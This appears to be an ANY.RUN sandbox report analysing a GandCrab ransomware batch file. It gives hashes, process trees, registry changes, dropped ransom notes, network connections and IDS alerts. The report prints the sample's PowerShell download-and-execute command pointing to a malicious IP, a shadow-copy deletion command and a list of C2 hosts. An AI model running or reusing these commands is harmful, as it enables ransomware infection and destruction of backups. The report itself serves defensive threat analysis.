analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

test_ran.bat

Full analysis: https://app.any.run/tasks/d24525c5-a64a-4773-9332-9837526b4e32
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date: November 08, 2018, 07:56:03
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
trojan
ransomware
gandcrab
Indicators:
MIME: text/plain
File info: ASCII text, with no line terminators
MD5:

9759D57F3A07768129AEEB1539D46C37

SHA1:

05142DAAC55AFF04AA6EDA6DB8962D3739A71EEA

SHA256:

C14013B44DFC2643A3BD32B17D5E55FF124BE64E313ABD5725C5B25B63AE2869

SSDEEP:

3:VSJJLNW4Fjn8tSXRKBJ9KLxKCQDmkdFMWEOtRjmnMXRLO9FX0:snW4pP0zmKtCkTqOtRjmnMB60

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3800)
    • Writes file to Word startup folder

      • powershell.exe (PID: 672)
    • Actions looks like stealing of personal data

      • powershell.exe (PID: 672)
    • Renames files like Ransomware

      • powershell.exe (PID: 672)
    • Dropped file may contain instructions of ransomware

      • powershell.exe (PID: 672)
    • GandCrab keys found

      • powershell.exe (PID: 672)
    • Deletes shadow copies

      • powershell.exe (PID: 672)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 672)
    • Connects to CnC server

      • powershell.exe (PID: 672)
  • SUSPICIOUS

    • Creates files like Ransomware instruction

      • powershell.exe (PID: 672)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 672)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 672)
    • Creates files in the user directory

      • powershell.exe (PID: 672)
  • INFO

    • Reads settings of System Certificates

      • powershell.exe (PID: 672)
    • Dropped object may contain TOR URL's

      • powershell.exe (PID: 672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
50
Monitored processes
7
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs #GANDCRAB powershell.exe wmic.exe no specs explorer.exe no specs notepad.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3800cmd /c ""C:\Users\admin\Desktop\test_ran.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
672powershell.exe IEX ((new-object net.webclient).downloadstring('http://198.211.105.99/kasa'));Invoke-SZYIITYRAYH;Start-Sleep -s 1000000;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3192"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
2147749908
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1880"C:\Windows\explorer.exe" C:\Windows\explorer.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1608"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Videos\BCAHATTDX-DECRYPT.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2420"C:\Windows\System32\cmd.exe" /c timeout -c 5 & del "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /f /qC:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2900timeout -c 5 C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
timeout - pauses command processing
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
442
Read events
356
Write events
86
Delete events
0

Modification events

(PID) Process:(672) powershell.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
4294901760
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
4294901760
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(672) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
Operation:writeName:FileTracingMask
Value:
4294901760
Executable files
0
Suspicious files
271
Text files
231
Unknown types
12

Dropped files

PID
Process
Filename
Type
672powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3GIYTCWY3I4ZMGHR936J.temp
MD5:
SHA256:
672powershell.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp
MD5:
SHA256:
672powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
MD5:
SHA256:
672powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
MD5:
SHA256:
672powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
MD5:
SHA256:
672powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
MD5:
SHA256:
672powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\BCAHATTDX-DECRYPT.txttext
MD5:EE078FE9377FCAEB5C548C88CAF47F82
SHA256:F4F635036030B1F3DECDABF1F875DCE3491C833BE1379B87BB68609093D45512
672powershell.exeC:\Users\admin\.oracle_jre_usage\BCAHATTDX-DECRYPT.txttext
MD5:EE078FE9377FCAEB5C548C88CAF47F82
SHA256:F4F635036030B1F3DECDABF1F875DCE3491C833BE1379B87BB68609093D45512
672powershell.exeC:\Users\admin\.oracle_jre_usage\90737d32e3abaa4.timestamp.bcahattdxbinary
MD5:A516219D1292E3595A472C8831BB0257
SHA256:4166EA1C7828E08C07DF8AFA4E7BFF8DCF75C957D0D5AB96150CEE93FFA768EF
672powershell.exeC:\Users\admin\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
145
TCP/UDP connections
252
DNS requests
112
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
672
powershell.exe
GET
78.46.77.98:80
http://www.2mmotorsport.biz/
DE
suspicious
672
powershell.exe
GET
302
192.185.159.253:80
http://www.pizcam.com/
US
malicious
672
powershell.exe
GET
200
74.220.215.73:80
http://www.bizziniinfissi.com/
US
html
6.96 Kb
malicious
672
powershell.exe
GET
200
136.243.13.215:80
http://www.holzbock.biz/
DE
html
1.78 Kb
suspicious
672
powershell.exe
GET
217.26.53.161:80
http://www.haargenau.biz/
CH
malicious
672
powershell.exe
GET
217.26.53.37:80
http://www.hrk-ramoz.com/
CH
malicious
672
powershell.exe
GET
301
83.138.82.107:80
http://www.swisswellness.com/
DE
whitelisted
672
powershell.exe
GET
200
198.211.105.99:80
http://198.211.105.99/kasa
US
text
287 Kb
malicious
672
powershell.exe
GET
301
83.166.138.7:80
http://www.whitepod.com/
CH
whitelisted
672
powershell.exe
GET
301
69.16.175.10:80
http://www.hardrockhoteldavos.com/
US
html
158 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
672
powershell.exe
78.46.77.98:80
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
672
powershell.exe
109.234.38.95:80
www.fliptray.biz
Webzilla B.V.
RU
unknown
672
powershell.exe
198.211.105.99:80
Digital Ocean, Inc.
US
malicious
672
powershell.exe
217.26.53.161:80
www.haargenau.biz
Hostpoint AG
CH
malicious
672
powershell.exe
136.243.13.215:80
www.holzbock.biz
Hetzner Online GmbH
DE
suspicious
672
powershell.exe
74.220.215.73:80
www.bizziniinfissi.com
Unified Layer
US
malicious
672
powershell.exe
78.46.77.98:443
www.2mmotorsport.biz
Hetzner Online GmbH
DE
suspicious
672
powershell.exe
192.185.159.253:80
www.pizcam.com
CyrusOne LLC
US
malicious
672
powershell.exe
83.138.82.107:80
www.swisswellness.com
hostNET Medien GmbH
DE
suspicious
672
powershell.exe
83.138.82.107:443
www.swisswellness.com
hostNET Medien GmbH
DE
suspicious

DNS requests

Domain
IP
Reputation
www.2mmotorsport.biz
  • 78.46.77.98
unknown
www.haargenau.biz
  • 217.26.53.161
unknown
www.bizziniinfissi.com
  • 74.220.215.73
malicious
www.holzbock.biz
  • 136.243.13.215
unknown
www.fliptray.biz
  • 109.234.38.95
malicious
www.pizcam.com
  • 192.185.159.253
unknown
www.swisswellness.com
  • 83.138.82.107
whitelisted
www.hotelweisshorn.com
  • 212.59.186.61
unknown
www.whitepod.com
  • 83.166.138.7
whitelisted
www.hardrockhoteldavos.com
  • 69.16.175.10
  • 69.16.175.42
whitelisted

Threats

PID
Process
Class
Message
672
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
672
powershell.exe
A Network Trojan was detected
ET TROJAN Possible Malicious PowerSploit PowerShell Script Observed over HTTP
672
powershell.exe
A Network Trojan was detected
ET TROJAN [eSentire] Win32/GandCrab v4/5 Ransomware CnC Activity
672
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
672
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
672
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
672
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
672
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
672
powershell.exe
A Network Trojan was detected
ET POLICY Data POST to an image file (jpg)
672
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] Win32/GandCrab Ransomware CnC Activity
No debug info